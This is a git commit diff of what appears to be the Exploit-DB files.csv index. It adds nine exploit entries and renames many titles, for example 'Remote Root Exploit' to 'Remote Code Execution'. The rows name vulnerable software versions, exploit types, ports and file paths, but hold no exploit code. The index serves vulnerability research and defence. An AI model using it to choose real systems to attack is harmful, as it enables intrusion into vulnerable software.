DB: 2016-12-07
9 new exploits MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC) Asterisk - (SIP channel driver / in pedantic mode) Remote Crash Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC) Asterisk 1.2.x - (SIP channel driver / in pedantic mode) Remote Crash F5 BIG-IP - Remote Root Authentication Bypass (1) F5 BIG-IP - Authentication Bypass (1) Ntpd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow NTPd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow NetCat 0.7.1 - Denial of Service Microsoft Event Viewer 1.0 - XML External Entity Injection Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection Apache CouchDB 2.0.0 - Local Privilege Escalation Samba 2.2.8 - Remote Root Exploit Samba 2.2.8 - Remote Code Execution Microsoft Windows - WebDAV Remote Root Exploit (2) Microsoft Windows - WebDAV Remote Code Execution (2) Microsoft IIS 5.0 - WebDAV Remote Root Exploit (3) (xwdav) Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav) miniSQL (mSQL) 1.3 - Remote GID Root Exploit miniSQL (mSQL) 1.3 - GID Remote Code Execution Real Server 7/8/9 (Windows / Linux) - Remote Root Exploit GtkFtpd 1.0.4 - Remote Root Buffer Overflow Real Server 7/8/9 (Windows / Linux) - Remote Code Execution GtkFtpd 1.0.4 - Buffer Overflow Solaris Sadmind - Default Configuration Remote Root Exploit Knox Arkeia Pro 5.1.12 - Backup Remote Root Exploit Solaris Sadmind - Default Configuration Remote Code Execution Knox Arkeia Pro 5.1.12 - Backup Remote Code Execution ProFTPd 1.2.9rc2 - ASCII File Remote Root Exploit ProFTPd 1.2.9rc2 - ASCII File Remote Code Execution ProFTPd 1.2.7 < 1.2.9rc2 - Remote Root / Brute Force Exploit ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit Cyrus IMSPD 1.7 - 'abook_dbname' Remote Code Execution Ethereal 0.10.0 < 0.10.2 - IGAP Overflow Remote Root Exploit Ethereal 0.10.0 < 0.10.2 - IGAP Overflow Monit 4.1 - Remote Root Buffer Overflow Monit 4.2 - Remote Root Buffer Overflow Monit 4.1 - Buffer Overflow Monit 4.2 - Buffer Overflow INND/NNRP < 1.6.x - Remote Root Overflow INND/NNRP < 1.6.x - Overflow Exploit LPRng (RedHat 7.0) - lpd Remote Root Format String LPRng (RedHat 7.0) - 'lpd' Format String BeroFTPD 1.3.4(1) (Linux/x86) - Remote Root Exploit BeroFTPD 1.3.4(1) (Linux/x86) - Remote Code Execution BIND 8.2.x - (TSIG) Remote Root Stack Overflow (1) BIND 8.2.x - (TSIG) Remote Root Stack Overflow (2) BIND 8.2.x - (TSIG) Remote Root Stack Overflow (3) BIND 8.2.x - (TSIG) Remote Root Stack Overflow (4) BIND 8.2.x - (TSIG) Stack Overflow (1) BIND 8.2.x - (TSIG) Stack Overflow (2) BIND 8.2.x - (TSIG) Stack Overflow (3) BIND 8.2.x - (TSIG) Stack Overflow (4) HP Web JetAdmin 6.5 - (connectedNodes.ovpl) Remote Root Exploit HP Web JetAdmin 6.5 - 'connectedNodes.ovpl' Remote Code Execution CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow Root Exploit CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow Solaris /bin/login (SPARC/x86) - Remote Root Exploit Solaris /bin/login (SPARC/x86) - Remote Code Execution Drcat 0.5.0-beta - (drcatd) Remote Root Exploit Drcat 0.5.0-beta - 'drcatd' Remote Code Execution Dropbear SSH 0.34 - Remote Root Exploit Dropbear SSH 0.34 - Remote Code Execution Apple Mac OSX 10.3.3 - AppleFileServer Remote Root Overflow Apple Mac OSX 10.3.3 - AppleFileServer Overflow Remote Code Execution Monit 4.2 - Basic Authentication Remote Root Exploit Monit 4.2 - Basic Authentication Remote Code Execution WvTFTPd 0.9 - Remote Root Heap Overflow WvTFTPd 0.9 - Heap Overflow Qwik SMTP 0.3 - Remote Root Format String Qwik SMTP 0.3 - Format String Citadel/UX 6.27 - Remote Root Format String Citadel/UX 6.27 - Format String Knox Arkeia Server Backup 5.3.x - Remote Root Exploit Knox Arkeia Server Backup 5.3.x - Remote Code Execution Smail 3.2.0.120 - Remote Root Heap Overflow mtftpd 0.0.3 - Remote Root Exploit Smail 3.2.0.120 - Heap Overflow mtftpd 0.0.3 - Remote Code Execution dSMTP Mail Server 3.1b - Linux Remote Root Format String dSMTP Mail Server 3.1b (Linux) - Format String Exploit IPSwitch IMail Server 8.15 - IMAPD Remote Root Exploit IPSwitch IMail Server 8.15 - IMAPD Remote Code Execution linux-ftpd-ssl 0.17 - (MKD/CWD) Remote Root Exploit linux-ftpd-ssl 0.17 - 'MKD'/'CWD' Remote Code Execution MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow Alt-N MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow GNU InetUtils ftpd 1.4.2 - (ld.so.preload) Remote Root Exploit GNU InetUtils ftpd 1.4.2 - 'ld.so.preload' Remote Code Execution ProFTPd 1.2.9 rc2 - (ASCII File) Remote Root Exploit ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution dproxy-nexgen (Linux/x86) - Remote Root Buffer Overflow dproxy-nexgen (Linux/x86) - Buffer Overflow Kerberos 1.5.1 - Kadmind Remote Root Buffer Overflow Kerberos 1.5.1 - Kadmind Buffer Overflow webdesproxy 0.0.1 - GET Request Remote Root Exploit (exec-shield) webdesproxy 0.0.1 - (exec-shield) GET Request Remote Code Execution VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Root Exploit VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Code Execution MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow Alt-N MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow Sun Solaris 10 - rpc.ypupdated Remote Root Exploit Sun Solaris 10 - 'rpc.ypupdated' Remote Code Execution ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Root Exploit ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Code Execution Sun Solaris 10 - rpc.ypupdated Remote Root Exploit (Metasploit) Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit) Trixbox 2.6.1 - (langChoice) Remote Root Exploit (Python) Trixbox 2.6.1 - (langChoice) Remote Code Execution (Python) Solaris 9 (UltraSPARC) - sadmind Remote Root Exploit Solaris 9 (UltraSPARC) - sadmind Remote Code Execution Apache SpamAssassin Milter Plugin 0.3.1 - Remote Root Command Execution Apache SpamAssassin Milter Plugin 0.3.1 - Remote Command Execution Microworld eScan AntiVirus < 3.x - Remote Root Command Execution Microworld eScan AntiVirus < 3.x - Remote Code Execution AIX5l with FTP-Server - Remote Root Hash Disclosure AIX5l with FTP-Server - Hash Disclosure McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Root Remote Code Execution) McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Remote Code Execution) ProFTPd 1.3.3c - Compromised Source Remote Root Trojan ProFTPd 1.3.3c - Compromised Source (Trojan) Remote Code Execution Comtrend ADSL Router CT-5367 C01_R12 - Remote Root Exploit Comtrend ADSL Router CT-5367 C01_R12 - Remote Code Execution MDaemon 9.6.4 - IMAPD FETCH Buffer Overflow (Metasploit) Alt-N MDaemon 9.6.4 - IMAPD FETCH Buffer Overflow (Metasploit) ACTi ASOC 2200 Web Configurator 2.6 - Remote Root Command Execution ACTi ASOC 2200 Web Configurator 2.6 - Remote Command Execution DreamBox DM800 1.5rc1 - Remote Root File Disclosure DreamBox DM800 1.5rc1 - File Disclosure TelnetD encrypt_keyid - Remote Root Function Pointer Overwrite TelnetD encrypt_keyid - Function Pointer Overwrite F5 BIG-IP - Remote Root Authentication Bypass (2) MySQL - Remote Root Authentication Bypass F5 BIG-IP - Authentication Bypass (2) MySQL - Authentication Bypass ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/Root SQL Injection ManageEngine Security Manager Plus 5.5 build 5505 - Remote Root/SYSTEM SQL Injection WIDZ 1.0/1.5 - Remote Root Compromise WIDZ 1.0/1.5 - Remote Code Execution Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH) DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow proManager 0.73 - (note.php) SQL Injection ProManager 0.73 - 'note.php' SQL Injection pNews 1.1.0 - (nbs) Remote File Inclusion pNews 1.1.0 - 'nbs' Parameter Remote File Inclusion Power Phlogger 2.0.9 - (config.inc.php3) File Inclusion Power Phlogger 2.0.9 - 'config.inc.php3' File Inclusion eFiction 3.1.1 - (path_to_smf) Remote File Inclusion eFiction 3.1.1 - 'path_to_smf' Remote File Inclusion FlexPHPNews 0.0.5 - (news.php newsid) SQL Injection FlexPHPNews 0.0.5 - 'newsid' Parameter SQL Injection Achievo 1.1.0 - (atk.inc config_atkroot) Remote File Inclusion Achievo 1.1.0 - 'config_atkroot' Parameter Remote File Inclusion SimpNews 2.40.01 - (print.php newnr) SQL Injection SimpNews 2.40.01 - 'newnr' Parameter SQL Injection PHPNews 0.93 - (format_menue) Remote File Inclusion PHPNews 0.93 - 'format_menue' Parameter Remote File Inclusion meBiblio 0.4.5 - (index.php action) Remote File Inclusion meBiblio 0.4.5 - 'action' Parameter Remote File Inclusion Joomla! Component rapidrecipe 1.6.5 - SQL Injection Joomla! Component Rapid Recipe 1.6.5 - SQL Injection mebiblio 0.4.7 - (SQL Injection / Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities mebiblio 0.4.7 - SQL Injection / Arbitrary File Upload / Cross-Site Scripting pLog - 'albumID' SQL Injection smeweb 1.4b - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities PLog 1.0.6 - 'albumID' Parameter SQL Injection smeweb 1.4b - SQL Injection / Cross-Site Scripting Joomla! Component joomradio 1.0 - 'id' SQL Injection Joomla! Component JoomRadio 1.0 - 'id' Parameter SQL Injection Battle Blog 1.25 - (comment.asp) SQL Injection Battle Blog 1.25 - 'comment.asp' SQL Injection 1Book Guestbook Script - Code Execution 1Book Guestbook Script 1.0.1 - Code Execution PHP-Address Book 3.1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities Joomla! Component EasyBook 1.1 - (gbid) SQL Injection 427bb 2.3.1 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities PHP-Address Book 3.1.5 - SQL Injection / Cross-Site Scripting Joomla! Component EasyBook 1.1 - 'gbid' Parameter SQL Injection 427bb 2.3.1 - SQL Injection / Cross-Site Scripting Power Phlogger 2.2.5 - (css_str) SQL Injection pSys 0.7.0.a - (shownews) SQL Injection Joomla! Component JoomlaDate - (user) SQL Injection Power Phlogger 2.2.5 - 'css_str' Parameter SQL Injection pSys 0.7.0.a - 'shownews' Parameter SQL Injection Joomla! Component JoomlaDate 1.2 - 'user' Parameter SQL Injection JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection phpinv 0.8.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities Joomla! Component yvcomment 1.16 - Blind SQL Injection JiRo's FAQ Manager eXperience 1.0 - 'fID' Parameter SQL Injection phpinv 0.8.0 - Local File Inclusion / Cross-Site Scripting Joomla! Component yvComment 1.16 - Blind SQL Injection BrowserCRM 5.002.00 - (clients.php) Remote File Inclusion BrowserCRM 5.002.00 - 'clients.php' Remote File Inclusion Joomla! Component rapidrecipe - SQL Injection Joomla! Component Rapid Recipe 1.6.6/1.6.7 - SQL Injection Joomla! Component iJoomla! News Portal - 'itemID' SQL Injection Joomla! Component iJoomla News Portal 1.0 - 'itemID' Parameter SQL Injection real estate Web site 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities telephone directory 2008 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities ASPilot Pilot Cart 7.3 - (article) SQL Injection real estate Web site 1.0 - SQL Injection / Cross-Site Scripting Telephone Directory 2008 - SQL Injection / Cross-Site Scripting ASPilot Pilot Cart 7.3 - 'article' Parameter SQL Injection Flux CMS 1.5.0 - (loadsave.php) Arbitrary File Overwrite pNews 2.08 - (shownews) SQL Injection Flux CMS 1.5.0 - 'loadsave.php' Arbitrary File Overwrite pNews 2.08 - 'shownews' Parameter SQL Injection ErfurtWiki R1.02b - (css) Local File Inclusion DCFM Blog 0.9.4 - (comments) SQL Injection yblog 0.2.2.2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities Insanely Simple Blog 0.5 - (index) SQL Injection ASPPortal Free Version - 'Topic_Id' SQL Injection Experts 1.0.0 - (answer.php) SQL Injection SyndeoCMS 2.6.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities ErfurtWiki R1.02b - Local File Inclusion DCFM Blog 0.9.4 - SQL Injection Yblog 0.2.2.2 - Cross-Site Scripting / SQL Injection Insanely Simple Blog 0.5 - SQL Injection ASPPortal Free Version - 'Topic_Id' Parameter SQL Injection Experts 1.0.0 - 'answer.php' SQL Injection SyndeoCMS 2.6.0 - Local File Inclusion / Cross-Site Scripting Yuhhu 2008 SuperStar - 'board' SQL Injection Yuhhu 2008 SuperStar - 'board' Parameter SQL Injection eFiction 3.0 - (toplists.php list) SQL Injection eFiction 3.0 - 'toplists.php' SQL Injection pSys 0.7.0 Alpha - (chatbox.php) SQL Injection pSys 0.7.0 Alpha - 'chatbox.php' SQL Injection pNews 2.03 - (newsid) SQL Injection pNews 2.03 - 'newsid' Parameter SQL Injection Joomla! Component JooBlog 0.1.1 - (PostID) SQL Injection Joomla! Component JooBlog 0.1.1 - 'PostID' Parameter SQL Injection FlexPHPNews 0.0.6 & PRO - (Authentication Bypass) SQL Injection FlexPHPNews 0.0.6 & PRO - Authentication Bypass E-ShopSystem - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities E-ShopSystem - Authentication Bypass / SQL Injection Battle Blog 1.25 - (uploadform.asp) Arbitrary File Upload Battle Blog 1.25 - 'uploadform.asp' Arbitrary File Upload 427BB Fourtwosevenbb 2.3.2 - SQL Injection 427BB 2.3.2 - SQL Injection Joomla! Component 'com_joomradio' - SQL Injection Joomla! Component JoomRadio 1.0 - SQL Injection Joomla! Component 'com_elite_experts' - SQL Injection Joomla! Component Elite Experts - SQL Injection ASPilot Pilot Cart 7.3 - newsroom.asp SQL Injection ASPilot Pilot Cart 7.3 - 'newsroom.asp' SQL Injection Contrexx ShopSystem 2.2 SP3 (catId) - Blind SQL Injection Contrexx ShopSystem 2.2 SP3 - 'catId' Parameter Blind SQL Injection Comtrend Router CT-5624 - Remote Root/Support Password Disclosure/Change Exploit Comtrend Router CT-5624 - Root/Support Password Disclosure/Change Exploit alt-n mdaemon free 12.5.4 - Persistent Cross-Site Scripting Alt-N MDaemon free 12.5.4 - Persistent Cross-Site Scripting SimpNews 2.0.1/2.13 - PATH_SIMPNEWS Remote File Inclusion SimpNews 2.0.1/2.13 - 'path_simpnews' Parameter Remote File Inclusion PHPNews 1.2.3/1.2.4 - auth.php Remote File Inclusion PHPNews 1.2.3/1.2.4 - 'auth.php' Remote File Inclusion PHPSysInfo 2.0/2.3 - 'index.php' sensor_program Parameter Cross-Site Scripting PHPSysInfo 2.0/2.3 - system_footer.php Multiple Parameter Cross-Site Scripting PHPSysInfo 2.0/2.3 - 'sensor_program' Parameter Cross-Site Scripting PHPSysInfo 2.0/2.3 - 'system_footer.php' Cross-Site Scripting Seowonintech Routers fw: 2.3.9 - Remote Root File Disclosure Seowonintech Routers fw: 2.3.9 - File Disclosure PHPNews 1.2.x - auth.php SQL Injection PHPNews 1.2.x - 'auth.php' SQL Injection efiction 1.0/1.1/2.0 - titles.php let Parameter Cross-Site Scripting efiction 1.0/1.1/2.0 - titles.php let Parameter SQL Injection efiction 1.0/1.1/2.0 - viewstory.php sid Parameter SQL Injection efiction 1.0/1.1/2.0 - viewuser.php uid Parameter SQL Injection efiction 1.0/1.1/2.0 - 'titles.php' Cross-Site Scripting efiction 1.0/1.1/2.0 - 'titles.php' SQL Injection efiction 1.0/1.1/2.0 - 'sid' Parameter SQL Injection efiction 1.0/1.1/2.0 - 'uid' Parameter SQL Injection 427BB 2.2 - showthread.php SQL Injection 427BB 2.2 - 'showthread.php' SQL Injection BrowserCRM - results.php Cross-Site Scripting Simpnews 2.x - Wap_short_news.php Remote File Inclusion Simpnews 2.x - 'Wap_short_news.php' Remote File Inclusion ZYXEL Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting ZYXEL Prestige 660H-61 ADSL Router - Cross-Site Scripting Yblog - funk.php id Parameter Cross-Site Scripting Yblog - tem.php action Parameter Cross-Site Scripting Yblog - uss.php action Parameter Cross-Site Scripting Yblog - 'funk.php' Cross-Site Scripting Yblog - 'tem.php' Cross-Site Scripting Yblog - 'uss.php' Cross-Site Scripting Simpnews 2.x - admin/index.php Unspecified Cross-Site Scripting Simpnews 2.x - admin/pwlost.php Unspecified Cross-Site Scripting Simpnews 2.x - 'index.php' Cross-Site Scripting Simpnews 2.x - 'pwlost.php' Cross-Site Scripting PHPNews 1.3 - Link_Temp.php Multiple Cross-Site Scripting Vulnerabilities PHPNews 1.3 - 'Link_Temp.php' Cross-Site Scripting Insanely Simple Blog 0.4/0.5 - 'index.php' current_subsection Parameter SQL Injection Insanely Simple Blog 0.4/0.5 - Blog Anonymous Blog Entry Cross-Site Scripting Insanely Simple Blog 0.4/0.5 - 'index.php' SQL Injection Insanely Simple Blog 0.4/0.5 - Cross-Site Scripting SimpNews 2.41.3 - admin/layout2b.php l_username Parameter Cross-Site Scripting SimpNews 2.41.3 - comment.php backurl Parameter Cross-Site Scripting SimpNews 2.41.3 - 'l_username' Parameter Cross-Site Scripting SimpNews 2.41.3 - 'backurl' Parameter Cross-Site Scripting BrowserCRM 5.100.1 - modules/Documents/version_list.php parent_id Parameter SQL Injection BrowserCRM 5.100.1 - modules/Documents/index.php contact_id Parameter SQL Injection BrowserCRM 5.100.1 - Multiple Script URI Cross-Site Scripting BrowserCRM 5.100.1 - license/index.php framed Parameter Cross-Site Scripting BrowserCRM 5.100.1 - licence/view.php framed Parameter Cross-Site Scripting BrowserCRM 5.100.1 - pub/clients.php login[] Parameter Cross-Site Scripting BrowserCRM 5.100.1 - 'index.php' login[] Parameter Cross-Site Scripting BrowserCRM 5.100.1 - 'parent_id' Parameter SQL Injection BrowserCRM 5.100.1 - 'contact_id' Parameter SQL Injection BrowserCRM 5.100.1 - URI Cross-Site Scripting BrowserCRM 5.100.1 - 'framed' Parameter Cross-Site Scripting Wordpress Plugin Single Personal Message 1.0.3 - SQL Injection BrowserCRM 5.100.1 - 'clients.php' Cross-Site Scripting BrowserCRM 5.100.1 - 'login[]' Cross-Site Scripting
This commit is contained in:
parent
5dc941e36b
commit
855e59f932
14 changed files with 816 additions and 172 deletions
314
files.csv
314
files.csv
|
@ -737,8 +737,8 @@ id,file,description,date,author,platform,type,port
|
|||
5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0
|
||||
5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
|
||||
5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0
|
||||
5727,platforms/windows/dos/5727.pl,"MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0
|
||||
5749,platforms/multiple/dos/5749.pl,"Asterisk - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0
|
||||
5727,platforms/windows/dos/5727.pl,"Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0
|
||||
5749,platforms/multiple/dos/5749.pl,"Asterisk 1.2.x - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0
|
||||
5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit",2008-06-14,"Praveen Darshanam",linux,dos,0
|
||||
5817,platforms/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow (PoC)",2008-06-14,t0pP8uZz,windows,dos,0
|
||||
5843,platforms/windows/dos/5843.html,"P2P Foxy - Out of Memory Denial of Service",2008-06-17,Styxosaurus,windows,dos,0
|
||||
|
@ -2221,7 +2221,7 @@ id,file,description,date,author,platform,type,port
|
|||
19045,platforms/aix/dos/19045.txt,"SunOS 4.1.3 - kmem setgid /etc/crash Exploit",1993-02-03,anonymous,aix,dos,0
|
||||
19046,platforms/aix/dos/19046.txt,"AppleShare IP Mail Server 5.0.3 - Buffer Overflow",1999-10-15,"Chris Wedgwood",aix,dos,0
|
||||
19049,platforms/aix/dos/19049.txt,"BSDI 4.0 tcpmux / inetd - Crash",1998-04-07,"Mark Schaefer",aix,dos,0
|
||||
19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP - Remote Root Authentication Bypass (1)",2012-06-11,"Florent Daigniere",hardware,dos,0
|
||||
19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP - Authentication Bypass (1)",2012-06-11,"Florent Daigniere",hardware,dos,0
|
||||
19075,platforms/linux/dos/19075.c,"APC PowerChute Plus 4.2.2 - Denial of Service",1998-04-10,Schlossnagle,linux,dos,0
|
||||
19080,platforms/linux/dos/19080.txt,"Debian suidmanager 0.18 - Exploit",1998-04-28,"Thomas Roessler",linux,dos,0
|
||||
19082,platforms/linux/dos/19082.txt,"AMD K6 Processor - Exploit",1998-06-01,Poulot-Cazajous,linux,dos,0
|
||||
|
@ -4984,7 +4984,7 @@ id,file,description,date,author,platform,type,port
|
|||
39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0
|
||||
39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
|
||||
39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0
|
||||
39445,platforms/linux/dos/39445.c,"Ntpd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0
|
||||
39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0
|
||||
39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - SEH Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0
|
||||
39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0
|
||||
39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack Based Buffer Overflow (1)",2016-02-16,"Google Security Research",linux,dos,0
|
||||
|
@ -5287,6 +5287,7 @@ id,file,description,date,author,platform,type,port
|
|||
40843,platforms/windows/dos/40843.html,"Microsoft Internet Explorer 11 - MSHTML 'CGeneratedContent::HasGeneratedSVGMarker' Type Confusion",2016-11-28,Skylined,windows,dos,0
|
||||
40844,platforms/windows/dos/40844.html,"Microsoft Internet Explorer 10 - MSHTML 'CEditAdorner::Detach' Use-After-Free (MS13-047)",2016-11-28,Skylined,windows,dos,0
|
||||
40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8/9/10/11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0
|
||||
40866,platforms/linux/dos/40866.py,"NetCat 0.7.1 - Denial of Service",2016-12-05,n30m1nd,linux,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -8673,12 +8674,15 @@ id,file,description,date,author,platform,type,port
|
|||
40859,platforms/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0
|
||||
40860,platforms/windows/local/40860.txt,"Microsoft Excel Starter 2010 - XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0
|
||||
40861,platforms/windows/local/40861.txt,"Microsoft Windows Media Center 6.1.7600 - 'ehshell.exe' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0
|
||||
40863,platforms/windows/local/40863.txt,"Microsoft Event Viewer 1.0 - XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
|
||||
40864,platforms/windows/local/40864.txt,"Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
|
||||
40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Local Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
7,platforms/linux/remote/7.pl,"Samba 2.2.x - Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139
|
||||
8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow",2003-04-08,zillion,linux,remote,0
|
||||
10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139
|
||||
10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Code Execution",2003-04-10,eSDee,linux,remote,139
|
||||
16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Command Execution",2003-04-18,einstein,linux,remote,1723
|
||||
18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution",2003-04-23,truff,linux,remote,0
|
||||
19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution",2003-04-25,blightninjas,linux,remote,1723
|
||||
|
@ -8692,7 +8696,7 @@ id,file,description,date,author,platform,type,port
|
|||
30,platforms/windows/remote/30.pl,"Snitz Forums 3.3.03 - Remote Command Execution",2003-05-12,anonymous,windows,remote,0
|
||||
33,platforms/linux/remote/33.c,"WsMp3d 0.x - Heap Overflow",2003-05-22,Xpl017Elz,linux,remote,8000
|
||||
34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 - (Apache) Remote Exploit",2003-05-29,anonymous,linux,remote,80
|
||||
36,platforms/windows/remote/36.c,"Microsoft Windows - WebDAV Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80
|
||||
36,platforms/windows/remote/36.c,"Microsoft Windows - WebDAV Remote Code Execution (2)",2003-06-01,alumni,windows,remote,80
|
||||
37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0
|
||||
38,platforms/linux/remote/38.pl,"Apache 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80
|
||||
39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Command Execution",2003-06-10,gunzip,linux,remote,69
|
||||
|
@ -8704,13 +8708,13 @@ id,file,description,date,author,platform,type,port
|
|||
48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80
|
||||
49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25
|
||||
50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80
|
||||
51,platforms/windows/remote/51.c,"Microsoft IIS 5.0 - WebDAV Remote Root Exploit (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80
|
||||
51,platforms/windows/remote/51.c,"Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80
|
||||
54,platforms/windows/remote/54.c,"LeapWare LeapFTP 2.7.x - Remote Buffer Overflow",2003-07-12,drG4njubas,windows,remote,21
|
||||
55,platforms/linux/remote/55.c,"Samba 2.2.8 - (Brute Force Method) Remote Command Execution",2003-07-13,Schizoprenic,linux,remote,139
|
||||
56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - 'nsiislog.dll' Remote Exploit",2003-07-14,anonymous,windows,remote,80
|
||||
57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 - (TTYPROMPT in.telnet) Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0
|
||||
58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504
|
||||
